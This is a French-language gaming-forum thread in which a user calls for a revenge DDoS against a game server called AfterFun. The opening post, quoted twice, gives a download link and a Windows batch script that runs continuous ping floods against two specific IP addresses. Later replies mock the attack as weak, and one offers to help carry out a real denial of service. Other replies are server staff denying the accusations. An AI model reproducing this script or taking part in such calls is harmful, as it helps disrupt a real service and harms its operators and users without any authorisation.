Jump to content

Recommended Posts

#OpAfterFun

Plop,

Je vous propose de faire une vangeance face au serveur qui à inpunément ddos plus d'un.

Pour ce, je vous propose de les ddos.

Téléchargez le fichier bat ici : http://uploading.com/2c9cda47/ping-afterfun-bat

Ou écrivez ceci dans un fichier texte puis mettez-le en .bat:

@echo off
title Ping to AfterFun (by [darK-Vlad])
:: Code by [darK-Vlad] ::
:: SPMKLL ::
taskkill /IM notepad.exe
color A
ping -t 185.41.154.187
color 5
ping -t 185.41.154.147
color 3
ping -t 185.41.154.147
color E
ping -t 185.41.154.187
echo.
echo.
echo.

color 6

echo Sachez que ce programme a été programmé par [darK-Vlad], tous droits réservés.
pause > nul

Merci à tous.

Bon jeu.

dark_vlad

Ca n'a rien d'une gaminerie.

Les dirigeants de ce serveur ont réellement ddos les trois quarts de leurs petits conccurents.

C'est déloyal et incorrigible.

Y'a aucune concurrence vous avez tous le même serveur, et oui DDOS pour se sentir plus fort, c'est des gamineries. Si vous arrivez pas à percer sans niquer les autres, posez-vous des questions sur le serveur que vous gérer.

Bonne chance :)

Pour votre sécuritée fermez les yeux sur ce topic les fantfants, la nature humaine est à sont plus bas cela peux être nocifs pour votre peux de QI

En effet , quoi de mieux de faire une mauvaise réputation à un serveur ? De la jalousie surement ..

#OpAfterFun

Plop,

Je vous propose de faire une vangeance face au serveur qui à inpunément ddos plus d'un.

Pour ce, je vous propose de les ddos.

Téléchargez le fichier bat ici : http://uploading.com/2c9cda47/ping-afterfun-bat

Ou écrivez ceci dans un fichier texte puis mettez-le en .bat:

@echo off
title Ping to AfterFun (by [darK-Vlad])
:: Code by [darK-Vlad] ::
:: SPMKLL ::
taskkill /IM notepad.exe
color A
ping -t 185.41.154.187
color 5
ping -t 185.41.154.147
color 3
ping -t 185.41.154.147
color E
ping -t 185.41.154.187
echo.
echo.
echo.

color 6

echo Sachez que ce programme a été programmé par [darK-Vlad], tous droits réservés.
pause > nul
Merci à tous.

Bon jeu.

dark_vlad

Je peux savoir d'où tu tire l'info du ddos ? Si tu a des preuves, ça me fera plaisir de t'aider à vraiment faire un dos aur eux. Car avec tes pings tu ira pas très loin.

Tu a fait ma journée ;)

Je peux savoir d'où tu tire l'info du ddos ? Si tu a des preuves, ça me fera plaisir de t'aider à vraiment faire un dos aur eux. Car avec tes pings tu ira pas très loin.

Tu a fait ma journée ;)

C'est de la jalousie , aucune preuve , un manque de maturité complet je vois ;) 

Bonjour , je pense que tu m'a l'air pas trés compétant dans le domaine du ' Ddos ' Cela fait rire mon équipe ps : Aucun joueur n'a subie d'attaques pirates .

Dit-il la personne a qui j'ai fais le logo pour AfterFun, et qui ma gentiment insulter tel un raciste :')

Tu la toujours, je vous avez pas dit de supprimer ?

Surtout que un pote leur financé des chose il ont baisé donc moi personnellement je vais m'occupez de leurs cas car ddos un autre serveur pour de la concurrence ça ne sert strictement à que dalle si appart  à montré que votre réputation n'est pas professionnel    

Surtout que un pote leur financé des chose il ont baisé donc moi personnellement je vais m'occupez de leurs cas car ddos un autre serveur pour de la concurrence ça ne sert strictement à que dalle si appart  à montré que votre réputation n'est pas professionnel    

Hum j'adore ta maturité , à tu une preuve que ont nous à financer ? Car le seul financer sont Bubu . Alors avant de critiquer un serveur sans preuves physique je te conseil de te taire . Car c'est un manque de maturité . La personne ayant crée ce poste n'a aucune preuve , et toi tu me fait assez rire sur ta maturité .

• Create New...